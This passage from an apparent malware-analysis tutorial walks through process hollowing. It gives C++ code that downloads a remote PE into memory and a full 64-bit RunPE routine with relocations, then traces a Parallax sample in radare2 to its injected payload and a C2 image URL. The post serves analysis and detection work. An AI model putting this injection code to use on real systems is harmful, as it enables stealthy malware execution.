//char *PE_buffer;
LPVOID PE_buffer;
// Make internet connection.
hInternetSession = InternetOpenA(
"Mozilla 1.2.3", // agent
NULL, NULL, 0); // defaults
// Make connection to desired page.
hURL = InternetOpenUrl(
hInternetSession, // session handle
fileUrl, // URL to access
NULL, 0, 0, 0); // defaults
// If connection to the file is successfully opened we go check for the file size
fSize = (int)HttpQueryInfoA(hURL,HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, &lpOutBuffer,&dwSize,NULL);
printf("[+] File size: %d \n", lpOutBuffer);
//PE_buffer = (char *) malloc(lpOutBuffer+1);
PE_buffer = VirtualAlloc(NULL, lpOutBuffer, MEM_COMMIT, PAGE_READWRITE);
printf("[-] Error allocating buffer for remote file: %d \n", GetLastError());
if(InternetReadFile(hURL, PE_buffer, lpOutBuffer, &dwBytesRead)){
printf("[+] Number of bytes read: %d \n",dwBytesRead);
return PE_buffer;
printf("[-] Error downloading the file content. Error: %d \n", GetLastError());
printf("[-] Error opening the url: %s Error code: %d \n", fileUrl, GetLastError());
// Close down connections.
return nullptr;
RUNPE 64 with RELOCs
So back to the example, the following code can be used to implement process hollowing with relocations. By using a legitimate PE and a PE retrieved either from a web server, a file on disk or whatever mean considered.
The process is simpe and very similar to the one of PE injection. First we load and hollow the remote process by unmapping the executable memory from the process memory space (not really necessary though), then we parse the buffer containing the evil PE as we previously seen, we make sure we have a memory buffer in the remote process, and then we write the PE headers, then we map the executable section by section using their virtual memory space and virtual addressess. After that we apply the needed relocations by using the .reloc section. After that we set the context of the remote suspended process in order to make it start at our entry point. After that we are ready to resume its execution.
Note that on a 32 bit process, when a process is started, ebx register is pointing to the TIB, and eax is pointing to the entry point. On a 64 bit process, rdx is pointing to the TIB, and rcx is pointing to the entry point. So don’t copy and paste a process hollowing PoC for x32 and try to implement it for an x64 it won’t work.
BOOL RunPEReloc64(const LPPROCESS_INFORMATION lpPI, const LPVOID lpImage, const LPVOID remoteBase)
LPVOID lpAllocAddress;
DWORD umResult;
const auto lpImageDOSHeader = (PIMAGE_DOS_HEADER)lpImage;
const auto lpImageNTHeader64 = (PIMAGE_NT_HEADERS64)((uintptr_t)lpImageDOSHeader + lpImageDOSHeader->e_lfanew);
umResult = UnmapSectionView(lpPI->hProcess, (LPVOID)remoteBase);
lpAllocAddress = VirtualAllocEx(lpPI->hProcess, (LPVOID)remoteBase, lpImageNTHeader64->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpAllocAddress == nullptr)
printf("[-] An error has occurred when trying to allocate memory for the new image. Error: %d \n", GetLastError());
return FALSE;
printf("[+] Memory allocate at : 0x%p\n", (LPVOID)(uintptr_t)lpAllocAddress);
const DWORD64 DeltaImageBase = (DWORD64)lpAllocAddress - lpImageNTHeader64->OptionalHeader.ImageBase;
lpImageNTHeader64->OptionalHeader.ImageBase = (DWORD64)lpAllocAddress;
const BOOL bWriteHeaders = WriteProcessMemory(lpPI->hProcess, lpAllocAddress, lpImage, lpImageNTHeader64->OptionalHeader.SizeOfHeaders, nullptr);
if (!bWriteHeaders)
printf("[-] An error has occurred when trying to write the headers of the new image. Error: %d \n", GetLastError());
return FALSE;
printf("[+] Headers write at : 0x%p\n", lpAllocAddress);
const IMAGE_DATA_DIRECTORY ImageDataReloc = GetRelocAddress64(lpImage);
PIMAGE_SECTION_HEADER lpImageRelocSection = nullptr;
for (int i = 0; i < lpImageNTHeader64->FileHeader.NumberOfSections; i++)
const auto lpImageSectionHeader = (PIMAGE_SECTION_HEADER)((uintptr_t)lpImageNTHeader64 + 4 + sizeof(IMAGE_FILE_HEADER) + lpImageNTHeader64->FileHeader.SizeOfOptionalHeader + (i * sizeof(IMAGE_SECTION_HEADER)));
if (ImageDataReloc.VirtualAddress >= lpImageSectionHeader->VirtualAddress && ImageDataReloc.VirtualAddress < (lpImageSectionHeader->VirtualAddress + lpImageSectionHeader->Misc.VirtualSize))
lpImageRelocSection = lpImageSectionHeader;
const BOOL bWriteSection = WriteProcessMemory(lpPI->hProcess, (LPVOID)((UINT64)lpAllocAddress + lpImageSectionHeader->VirtualAddress), (LPVOID)((UINT64)lpImage + lpImageSectionHeader->PointerToRawData), lpImageSectionHeader->SizeOfRawData, nullptr);
if (!bWriteSection)
printf("[-] An error has occurred when trying to write the section : %s. Error %d \n", (LPSTR)lpImageSectionHeader->Name, GetLastError());
return FALSE;
printf("[+] Section %s write at : 0x%p.\n", (LPSTR)lpImageSectionHeader->Name, (LPVOID)((UINT64)lpAllocAddress + lpImageSectionHeader->VirtualAddress));
if (lpImageRelocSection == nullptr)
printf("[-] An error has occurred when trying to get the relocation section of the source image. Error %d \n", GetLastError());
return FALSE;
printf("[+] Relocation section : %s\n", (char*)lpImageRelocSection->Name);
DWORD RelocOffset = 0;
while (RelocOffset < ImageDataReloc.Size)
const auto lpImageBaseRelocation = (PIMAGE_BASE_RELOCATION)((DWORD64)lpImage + lpImageRelocSection->PointerToRawData + RelocOffset);
RelocOffset += sizeof(IMAGE_BASE_RELOCATION);
const DWORD NumberOfEntries = (lpImageBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOCATION_ENTRY);
for (DWORD i = 0; i < NumberOfEntries; i++)
const auto lpImageRelocationEntry = (PIMAGE_RELOCATION_ENTRY)((DWORD64)lpImage + lpImageRelocSection->PointerToRawData + RelocOffset);
RelocOffset += sizeof(IMAGE_RELOCATION_ENTRY);
if (lpImageRelocationEntry->Type == 0)
const DWORD64 AddressLocation = (DWORD64)lpAllocAddress + lpImageBaseRelocation->VirtualAddress + lpImageRelocationEntry->Offset;
DWORD64 PatchedAddress = 0;
ReadProcessMemory(lpPI->hProcess, (LPVOID)AddressLocation, &PatchedAddress, sizeof(DWORD64), nullptr);
PatchedAddress += DeltaImageBase;
WriteProcessMemory(lpPI->hProcess, (LPVOID)AddressLocation, &PatchedAddress, sizeof(DWORD64), nullptr);
printf("[+] Relocations done.\n");
CTX.ContextFlags = CONTEXT_FULL;
const BOOL bGetContext = GetThreadContext(lpPI->hThread, &CTX);
if (!bGetContext)
printf("[-] An error has occurred when trying to get the thread context. Error: %d \n", GetLastError());
return FALSE;
const BOOL bWritePEB = WriteProcessMemory(lpPI->hProcess, (LPVOID)(CTX.Rdx + 0x10), &lpImageNTHeader64->OptionalHeader.ImageBase, sizeof(DWORD64), nullptr);
if (!bWritePEB)
printf("[-] An error has occurred when trying to write the image base in the PEB. Error: %d \n", GetLastError());
return FALSE;
CTX.Rcx = (DWORD64)lpAllocAddress + lpImageNTHeader64->OptionalHeader.AddressOfEntryPoint;
const BOOL bSetContext = SetThreadContext(lpPI->hThread, &CTX);
if (!bSetContext)
printf("[-] An error has occurred when trying to set the thread context. Error: %d \n", GetLastError());
return FALSE;
return TRUE;
The code related to the memory unmapping can be found here:
BOOL UnmapSectionView(const HANDLE hProcess, const LPVOID base)
DWORD dwResult = NULL;
HMODULE hNtdllBase = GetModuleHandleA("ntdll.dll");
pfnZwUnmapViewOfSection pZwUnmapViewOfSection = (pfnZwUnmapViewOfSection)GetProcAddress(hNtdllBase, "ZwUnmapViewOfSection");
dwResult = pZwUnmapViewOfSection(hProcess, (LPVOID)base);
return dwResult;
Statically, we start by detecting a VirtualAllocEx
Then a Write memory…
We can also detect the writting of the headers and sections:
The loop through the relocation table:
And the set thread context, which is very important here:
Process injection in Parallax
And now let’s check how it looks like in a real malware! We will be working with This parallax sample
So image the following situation. You work in threat intelligence / malware reversing and the forensics team sends you a sample, they also conducted an initial examination that indicates some correlation with the Parallax malware, your goal should focus on retrieving the malware payload as well as some C2 configuration.
After some radare2 and some googling you get to the following article by vk_intel
The following workflow catches your attention:
And you also see that the malware may implement some obfuscation and anti analysis techniques.
So from this point, we may load the malware into radare2 or some other for static analysis, we’ll see heavy obfuscation. Because of that, we may try to go for a dynamic analysis and see if we can follow the workflow and extract something:
So we run till the entry point, and we start placing breakpoints on calls related to Memory allocation and management as well as process management:
[0x772b1ba3]> dcu entry0
Continue until 0x00401584 using 1 bpsize
(1736) loading library at 0x76210000 (C:\Windows\SysWOW64\imm32.dll) imm32.dll
(1736) Created thread 2456 (start @ 77235900) (teb @ 003FC000)
hit breakpoint at: 0x401584
[0x00401584]> dmi KERNEL32 CreateProcessW
nth paddr vaddr bind type size lib name
235 0x000098e0 0x752f88e0 GLOBAL FUNC 0 KERNEL32.dll CreateProcessW
8 0x00067510 0x75361510 NONE FUNC 0 api-ms-win-core-processthreads-l1-1-0.dll imp.CreateProcessW
[0x00401584]> dmi ntdll RtlDecompressBuffer
nth paddr vaddr bind type size lib name
894 0x000d9b20 0x772da720 GLOBAL FUNC 0 ntdll.dll RtlDecompressBuffer
[0x00401584]> dmi ntdll NtWriteVirtualMemory
nth paddr vaddr bind type size lib name
697 0x00072170 0x77272d70 GLOBAL FUNC 0 ntdll.dll NtWriteVirtualMemory
[0x00401584]> db 0x772da720
[0x00401584]> db 0x752f88e0
[0x00401584]> db 0x77272d70
Note that as this is a malware that takes obfuscation somehow seriously, it looks like it avoids standard api kernel32 api calls and goes for undocummented ntdll calls
So we hit the first breakpoint, related to CreateProcess. We see mstsc.exe being spawned in a suspended state. At this point it is very important to mark the process handle.
hit breakpoint at: 0x752f88e0
[0x752f88e0]> pxr @ esp
0x0019f120 0x00714059 Y@q. @ esp PRIVATE ascii ('Y') R W X 'mov dword [ebp - 0x90], eax' 'PRIVATE '
0x0019f124 0x0019f150 P... PRIVATE edx R W 0x3a0043
0x0019f128 ..[ null bytes ].. 00000000
0x0019f138 0x08000004 ....
0x0019f13c ..[ null bytes ].. 00000000
0x0019f144 0x0019f5b0 .... PRIVATE ecx R W 0x0
0x0019f148 0x0019faa0 .... PRIVATE eax R W 0x0
0x0019f14c 0x00508508 ..P. IMAGE .data esi R W 0x0
0x0019f150 0x003a0043 C.:. @ edx PRIVATE ascii ('C')
0x0019f154 0x0057005c \.W. PRIVATE ascii ('\') R W 0x0
0x0019f158 0x006e0069 i.n. PRIVATE ascii ('i')
0x0019f15c 0x006f0064 d.o. PRIVATE ascii ('d')
[0x752f88e0]> pxw @ 0x0019f150
0x0019f150 0x003a0043 0x0057005c 0x006e0069 0x006f0064 C.:.\.W.i.n.d.o.
0x0019f160 0x00730077 0x0073005c 0x00730079 0x00650074 w.s.\.s.y.s.t.e.
0x0019f170 0x0033006d 0x005c0032 0x0073006d 0x00730074 m.3.2.\.m.s.t.s.
0x0019f180 0x002e0063 0x00780065 0x00000065 0x00000000 c...e.x.e.......
And we can effectively see that the program creates a sub-process:
Selected: 1736 2116
* 1736 ppid:2564 uid:-1 s C:\Users\lab\Desktop\radare2-5.7.6-w32\bin\para.exe
- 684 ppid:1736 uid:-1 s C:\Windows\SysWOW64\mstsc.exe
We then hit NtlWriteVirtualMemory which seems to write some data into the remote process
[0x752f88e0]> dc
hit breakpoint at: 0x77272d70
[0x77272d70]> pxr @ esp
0x0019e3ec 0x751bf6df ...u @ esp IMAGE R X 'mov dword [ebp - 0x838], eax' 'IMAGE '
0x0019e3f0 0x0000031c .... 796
0x0019e3f4 0x004fd1e8 ..O. IMAGE .text sub.OLEAUT32.DLL_SafeArrayGetLBound,eax sub.OLEAUT32.DLL_SafeArrayGetLBound R X 'jmp dword [0x515ec0]' 'IMAGE '
0x0019e3f8 0x0019e638 8... PRIVATE R W 0x650000
0x0019e3fc 0x00000004 .... 4
0x0019e400 ..[ null bytes ].. 00000000
0x0019e404 0x4fe7958f ...O
But nothing of interestm just a few bytes. We hit that three more times with the same result, and then we hit RtlDecompressBuffer
hit breakpoint at: 0x772da720
[0x772da720]> pxr @ esp
0x0019f130 0x00714283 .Bq. @ esp PRIVATE R W X 'mov eax, dword [ebp - 0xd8]' 'PRIVATE '
0x0019f134 0x00000002 .... 2
0x0019f138 0x0078f270 p.x. PRIVATE edx R W 0x0
0x0019f13c 0x00014e94 .N.. MAPPED ecx R W 0x0
0x0019f140 0x00714f0b .Oq. PRIVATE eax R W X 'add edi, dword [ebx - 0xe74aa00]' 'PRIVATE '
0x0019f144 0x000053a5 .S.. 21413
0x0019f148 0x0019fa60 `... PRIVATE R W 0x53a5
0x0019f14c 0x00508508 ..P. IMAGE .data esi R W 0x0
0x0019f150 0x003a0043 C.:. PRIVATE ascii ('C')
We see an empty buffer as well as something that looks like a compressed PE:
[0x772da720]> pxw @ 0x0078f270
0x0078f270 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f280 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f290 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f2a0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f2b0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f2c0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f2d0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f2e0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f2f0 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f300 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f310 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f320 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f330 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f340 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f350 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x0078f360 0x00000000 0x00000000 0x00000000 0x00000000 ................
[0x772da720]> pxw @ 0x00714f0b
0x00714f0b 0x5600bb03 0x48e8f18b 0x00000003 0x00800068 ...V...H....h...
0x00714f1b 0x56006a00 0xf5ddba00 0xc88bcd53 0x00d400e8 .j.V....S.......
0x00714f2b 0xd0ff0000 0x5500c35e 0x5756ec8b 0x088bf28b ....^..U..VW....
0x00714f3b 0x0022e8f9 0x03d0ba94 0x00090a5c 0x7400b674 ..".....\...t..t
0x00714f4b 0x75ff006a 0x75ff0c00 0xff575608 0x5e5f60d0 j..u...u.VW..`_^
0x00714f5b 0x02ccc35d 0xf89e0100 0x52000242 0xb09315f4 ].......B..R....
0x00714f6b 0x5d8c5200 0x01565200 0x023c0390 0x3e01d83e .R.].RV...<.>..>
0x00714f7b 0xfb41e865 0x6c3e00a7 0x21074902 0xb2426f07 e.A...>l.I.!.oB.
0x00714f8b 0x5c782501 0x2500553b 0x2502c546 0x00a20068 .%x\;U.%F..%h...
0x00714f9b 0x7801036a 0x01457506 0x2901884f 0x01ce0d4a j..x.uE.O..)J...
0x00714fab 0x01e11c99 0x00680422 0x00760030 0x43780728 ....".h.0.v.(.xC
0x00714fbb 0x5f000004 0x530cec83 0x00f96300 0xb8fc5589 ..._...S.c...U..
0x00714fcb 0x00005a4d 0x07396600 0x478b5475 0xc703003c MZ...f9.uT.G<...
0x00714fdb 0x45503881 0x75200000 0x014cb947 0x04480b01 .8PE.. uG.L...H.
0x00714feb 0x8b3c7500 0x4d897848 0xc98500f4 0x78833274 .u<.Hx.M....t2.x
0x00714ffb 0x76000074 0x74cf032c 0x00418b28 0x8bf63320 t..v,..t(.A. 3..
After the call, we can inspect the decompressed buffer in that position in memory:
[0x772da720]> dcr
hit breakpoint at: 0x772da762
hit breakpoint at: 0x772da764
[0x772da76d]> pxw @ 0x0078f270
0x0078f270 0xe8f18b56 0x00000348 0x00800068 0x56006a00 V...H...h....j.V
0x0078f280 0x53f5ddba 0xe8c88bcd 0x000000d4 0xc35ed0ff ...S..........^.
0x0078f290 0x56ec8b55 0x8bf28b57 0x0322e8f9 0xd0ba0000 U..VW.....".....
0x0078f2a0 0x8b095c03 0x00b6e8c8 0x006a0000 0xff0c75ff .\........j..u..
0x0078f2b0 0x57560875 0x5e5fd0ff 0xccccc35d 0xcccccccc u.VW.._^].......
0x0078f2c0 0xe8f18b56 0x000002f8 0x9315f4ba 0xe8c88bb0 V...............
0x0078f2d0 0x0000008c 0x5ed0ff56 0xccccccc3 0xcccccccc ....V..^........
0x0078f2e0 0xe8f18b56 0x000002d8 0xfb4165ba 0xe8c88ba7 V........eA.....
0x0078f2f0 0x0000006c 0xff56006a 0xccc35ed0 0xcccccccc l...j.V..^......
0x0078f300 0x56ec8b55 0x8bf28b57 0x02b2e8f9 0x78ba0000 U..VW..........x
0x0078f310 0x8b553b5c 0x0046e8c8 0x006a0000 0x00008068 \;U...F...j.h...
0x0078f320 0x6a036a00 0x0875ff00 0xd0ff5756 0xc35d5e5f .j.j..u.VW.._^].
0x0078f330 0xe8f18b56 0x00000288 0xce0d4aba 0xe8c88b09 V........J......
0x0078f340 0x0000001c 0x0068046a 0x56000030 0xd0ff006a ....j.h.0..Vj...
0x0078f350 0xccccc35e 0xcccccccc 0xcccccccc 0xcccccccc ^...............
0x0078f360 0x83ec8b55 0x56530cec 0x89f98b57 0x4db8fc55 U.....SVW...U..M
[0x772da76d]> pd 80 @ 0x0078f270
0x0078f270 56 push esi
0x0078f271 8bf1 mov esi, ecx
0x0078f273 e848030000 call 0x78f5c0
0x0078f278 6800800000 push 0x8000
0x0078f27d 6a00 push 0
0x0078f27f 56 push esi
0x0078f280 baddf553cd mov edx, 0xcd53f5dd
0x0078f285 8bc8 mov ecx, eax
0x0078f287 e8d4000000 call 0x78f360
0x0078f28c ffd0 call eax
0x0078f28e 5e pop esi
0x0078f28f c3 ret
And it corresponds to executable code, so we may have identified a payload.
After returning from that call, we’ll see that no more NtWriteVirtualMemory nor NtResumeThread are getting call though we see debug messages and we see a thread being spawned on the mstsc process and the loading completed…
So we go check and inspect what happens after we return from RtlDecompressBuffer.
We’ll see a bunch of calls like that:
[0x00714283]> pd 80
;-- eip:
0x00714283 8b8528ffffff mov eax, dword [ebp - 0xd8]
0x00714289 898568ffffff mov dword [ebp - 0x98], eax
0x0071428f c745a8000000. mov dword [ebp - 0x58], 0
0x00714296 c745ac000000. mov dword [ebp - 0x54], 0
0x0071429d c78558fcffff. mov dword [ebp - 0x3a8], 0
0x007142a7 8b8d40feffff mov ecx, dword [ebp - 0x1c0]
0x007142ad 51 push ecx
0x007142ae e86df0ffff call 0x713320
0x007142b3 83c404 add esp, 4
0x007142b6 89853cfeffff mov dword [ebp - 0x1c4], eax
0x007142bc 8b953cfeffff mov edx, dword [ebp - 0x1c4]
0x007142c2 8b4580 mov eax, dword [ebp - 0x80]
0x007142c5 8d8c504e1000. lea ecx, [eax + edx*2 + 0x104e]
0x007142cc 33d2 xor edx, edx
0x007142ce 898dc4fdffff mov dword [ebp - 0x23c], ecx
0x007142d4 8995c8fdffff mov dword [ebp - 0x238], edx
0x007142da 8b45c0 mov eax, dword [ebp - 0x40]
0x007142dd 99 cdq
0x007142de 8985a8fcffff mov dword [ebp - 0x358], eax
0x007142e4 8995acfcffff mov dword [ebp - 0x354], edx
0x007142ea 8d45a8 lea eax, [ebp - 0x58]
0x007142ed 99 cdq
0x007142ee 8985b0fcffff mov dword [ebp - 0x350], eax
0x007142f4 8995b4fcffff mov dword [ebp - 0x34c], edx
0x007142fa c785b8fcffff. mov dword [ebp - 0x348], 0
0x00714304 c785bcfcffff. mov dword [ebp - 0x344], 0
0x0071430e 8d85c4fdffff lea eax, [ebp - 0x23c]
0x00714314 99 cdq
0x00714315 8985c0fcffff mov dw
In what seems to be a process of argument parsing and loading, decoding and calling to custom implemented functions:
So we place some breakpoints before and after the calls we are seeing, to check their parameters and output:
[0x00714283]> db 0x007144ca
[0x00714283]> db 0x007144f8
[0x00714283]> db 0x0071448a
And after some, we’ll see a call, inspecting its parameters we will identify the handle to the remote mstsc suspended process:
[0x007144cf]> pd 20
;-- eip:
0x007144cf 83c408 add esp, 8
0x007144d2 8b4dd4 mov ecx, dword [ebp - 0x2c]
0x007144d5 51 push ecx
0x007144d6 8b55d8 mov edx, dword [ebp - 0x28]
0x007144d9 52 push edx
0x007144da 8b4508 mov eax, dword [ebp + 8]
0x007144dd 50 push eax
0x007144de 8b4de8 mov ecx, dword [ebp - 0x18]
0x007144e1 51 push ecx
0x007144e2 8b5580 mov edx, dword [ebp - 0x80]
0x007144e5 52 push edx
0x007144e6 8b8568ffffff mov eax, dword [ebp - 0x98]
0x007144ec 50 push eax
0x007144ed 8b8d20ffffff mov ecx, dword [ebp - 0xe0]
0x007144f3 51 push ecx
0x007144f4 8b55c0 mov edx, dword [ebp - 0x40]
0x007144f7 52 push edx
0x007144f8 b e8f3080000 call 0x714df0
0x007144fd 83c420 add esp, 0x20
0x00714500 898564ffffff mov dword [ebp - 0x9c], eax
[0x007144cf]> dc
hit breakpoint at: 0x7144f8
[0x007144cf]> pxr @ esp
0x0019f12c 0x0000031c .... @ esp 796 edx ; process handle
0x0019f130 0x0066006c l.f. MAPPED ecx ascii ('l') R 0x1740000
0x0019f134 0x0078f270 p.x. PRIVATE eax R W 0xe8f18b56
0x0019f138 0x00007924 $y.. 31012 ascii ('$')
0x0019f13c 0x00000001 .... 1
0x0019f140 0x0019fb14 .... PRIVATE R W 0x19fb30
0x0019f144 0x043a2d70 p-:. IMAGE R X 'mov eax, 0x3a' 'IMAGE '
0x0019f148 0x0000003a :... 58 ascii (':')
0x0019f14c 0x00508508 ..P. IMAGE .data R W 0x0
As well as a reference to a buffer, which clearly corresponds to executable code.
If we follow the call and we dive deeper we’ll see some argument loading and a reference to another call:
[0x00714df0]> pd 90
;-- eip:
0x00714df0 55 push ebp
0x00714df1 8bec mov ebp, esp
0x00714df3 83ec58 sub esp, 0x58
0x00714df6 8b450c mov eax, dword [ebp + 0xc]
0x00714df9 33c9 xor ecx, ecx
0x00714dfb 8945f0 mov dword [ebp - 0x10], eax
0x00714dfe 894df4 mov dword [ebp - 0xc], ecx
0x00714e01 8b5514 mov edx, dword [ebp + 0x14]
0x00714e04 33c0 xor eax, eax
0x00714e06 8955d8 mov dword [ebp - 0x28], edx
0x00714e09 8945dc mov dword [ebp - 0x24], eax
0x00714e0c 8b4510 mov eax, dword [ebp + 0x10]
0x00714e0f 99 cdq
0x00714e10 8945e0 mov dword [ebp - 0x20], eax
0x00714e13 8955e4 mov dword [ebp - 0x1c], edx
0x00714e16 8b4508 mov eax, dword [ebp + 8]
0x00714e19 99 cdq
0x00714e1a 8945e8 mov dword [ebp - 0x18], eax
0x00714e1d 8955ec mov dword [ebp - 0x14], edx
0x00714e20 c745fc000000. mov dword [ebp - 4], 0
0x00714e27 8b4de8 mov ecx, dword [ebp - 0x18]
0x00714e2a 894da8 mov dword [ebp - 0x58], ecx
0x00714e2d 8b55ec mov edx, dword [ebp - 0x14]
0x00714e30 8955ac mov dword [ebp - 0x54], edx
0x00714e33 8b45f0 mov eax, dword [ebp - 0x10]
0x00714e36 8945b0 mov dword [ebp - 0x50], eax
0x00714e39 8b4df4 mov ecx, dword [ebp - 0xc]
0x00714e3c 894db4 mov dword [ebp - 0x4c], ecx
0x00714e3f 8b55e0 mov edx, dword [ebp - 0x20]
0x00714e42 8955b8 mov dword [ebp - 0x48], edx
0x00714e45 8b45e4 mov eax, dword [ebp - 0x1c]
0x00714e48 8945bc mov dword [ebp - 0x44], eax
0x00714e4b 8b4dd8 mov ecx, dword [ebp - 0x28]
0x00714e4e 894dc0 mov dword [ebp - 0x40], ecx
0x00714e51 8b55dc mov edx, dword [ebp - 0x24]
0x00714e54 8955c4 mov dword [ebp - 0x3c], edx
0x00714e57 8d45d0 lea eax, [ebp - 0x30]
0x00714e5a 99 cdq
0x00714e5b 8945c8 mov dword [ebp - 0x38], eax
0x00714e5e 8955cc mov dword [ebp - 0x34], edx
0x00714e61 837d1800 cmp dword [ebp + 0x18], 0
,=< 0x00714e65 741d je 0x714e84
| 0x00714e67 8b4524 mov eax, dword [ebp + 0x24]
| 0x00714e6a 8945f8 mov dword [ebp - 8], eax
| 0x00714e6d 6a05 push 5 ; 5
| 0x00714e6f 8d4da8 lea ecx, [ebp - 0x58]
| 0x00714e72 51 push ecx
| 0x00714e73 8b55f8 mov edx, dword [ebp - 8]
| 0x00714e76 52 push edx
| 0x00714e77 e884cbffff call 0x711a00
| 0x00714e7c 83c40c add esp, 0xc
| 0x00714e7f 8945fc mov dword [ebp - 4], eax
,==< 0x00714e82 eb1a jmp 0x714e9e
|`-> 0x00714e84 8d45d0 lea eax, [ebp - 0x30]
| 0x00714e87 50 push eax
| 0x00714e88 8b4d14 mov ecx, dword [ebp + 0x14]
| 0x00714e8b 51 push ecx
| 0x00714e8c 8b5510 mov edx, dword [ebp + 0x10]
| 0x00714e8f 52 push edx
| 0x00714e90 8b45f0 mov eax, dword [ebp - 0x10]
| 0x00714e93 50 push eax
| 0x00714e94 8b4d08 mov ecx, dword [ebp + 8]
| 0x00714e97 51 push ecx
| 0x00714e98 ff5520 call dword [ebp + 0x20] ; 32
| 0x00714e9b 8945fc mov dword [ebp - 4], eax
`--> 0x00714e9e 8b45fc mov eax, dword [ebp - 4]
0x00714ea1 8be5 mov esp, ebp
0x00714ea3 5d pop ebp
0x00714ea4 c3 ret
If we move there we can confirm our hypothesis:
[0x00714df0]> db 0x00714e77
[0x00714df0]> dc
hit breakpoint at: 0x714e77
[0x00714e77]> pxr @ esp
0x0019f0c0 0x0000003a :... @ esp 58 edx,eax ascii (':')
0x0019f0c4 0x0019f0cc .... PRIVATE ecx R W 0x31c
0x0019f0c8 0x00000005 .... 5
0x0019f0cc 0x0000031c .... @ ecx 796
0x0019f0d0 ..[ null bytes ].. 00000000
0x0019f0d4 0x0066006c l.f. MAPPED ascii ('l') R 0x1740000
0x0019f0d8 ..[ null bytes ].. 00000000
0x0019f0dc 0x0078f270 p.x. PRIVATE R W 0xe8f18b56
0x0019f0e0 ..[ null bytes ].. 00000000
0x0019f0e4 0x00007924 $y.. 31012 ascii ('$')
0x0019f0e8 ..[ null bytes ].. 00000000
0x0019f0ec 0x0019f0f4 .... PRIVATE R W 0x19efd0
0x0019f0f0 ..[ null bytes ].. 00000000
0x0019f0f4 0x0019efd0 .... PRIVATE R W 0x36323631 1626
After being called, we’ll see that getting written into the remote process (0x0066006c argument):
And if we move forward we see a similar call, by inspecting it, we’ll get to the C2 url!
[0x00714e77]> pd 20 @ 0x0078f270
0x0078f270 56 push esi
0x0078f271 8bf1 mov esi, ecx
0x0078f273 e848030000 call 0x78f5c0
0x0078f278 6800800000 push 0x8000
0x0078f27d 6a00 push 0
0x0078f27f 56 push esi
0x0078f280 baddf553cd mov edx, 0xcd53f5dd
0x0078f285 8bc8 mov ecx, eax
0x0078f287 e8d4000000 call 0x78f360
after another call
Which can be easily extracted from memory:
[0x00714e77]> pxw @ 0x0019fb30
0x0019fb30 0x70747468 0x2f2f3a73 0x6d692e69 0x2e727567 https://i.imgur.
0x0019fb40 0x2f6d6f63 0x68736d65 0x2e545445 0x00676e70 com/emshETT.png.
0x0019fb50 0x00000000 0x3bc01699 0x3bc01699 0x3bc01699 .......;...;...;
0x0019fb60 0x3bc01699 0x3bc01699 0x3bc01699 0x3bc01699 ...;...;...;...;
And will appear right after on the remote process:
And corresponds to this image (screenshot):
At this point we can debug the remote process, place breakpoints there and continue the inspection. We’ll see references to WINNINET API calls downading that image, storting it into TMP and using it for config extraction, as well as the spawn and migration to cmd.exe process and some regedit… but we’ll get into that in future posts, enough for today:)
Apis to watch out for
Any of these may qualify for a breakpoint when analyzing malware. Note that Zw and Nt can be used as prefixes as well as A/W as suffixes.
- VirtualAllocEx
- VirtualAlloc
- VirtualProtectEx
- ReadProcessMemory
- WriteProcessMemory
- CreateProcess
- CreateRemoteThread
- CreateToolhelp32Snapshot
- Process32First
- Process32Next
To unmap memory:
- NtUnmapViewOfSection
- zWUnmapViewOfSection
- NtFlushVirtualMemory
- ZwFlushVirtualMemory
To allocate, read and write memory:
- NtWriteVirtualMemory
- NtProtectVirtualMemory
- NtAllocateVirtualMemory
- NtQueryVirtualMemory
- NtReadVirtualMemory
To execute:
- NtCreateThread
- NtResumeThread
- NtOpenProcess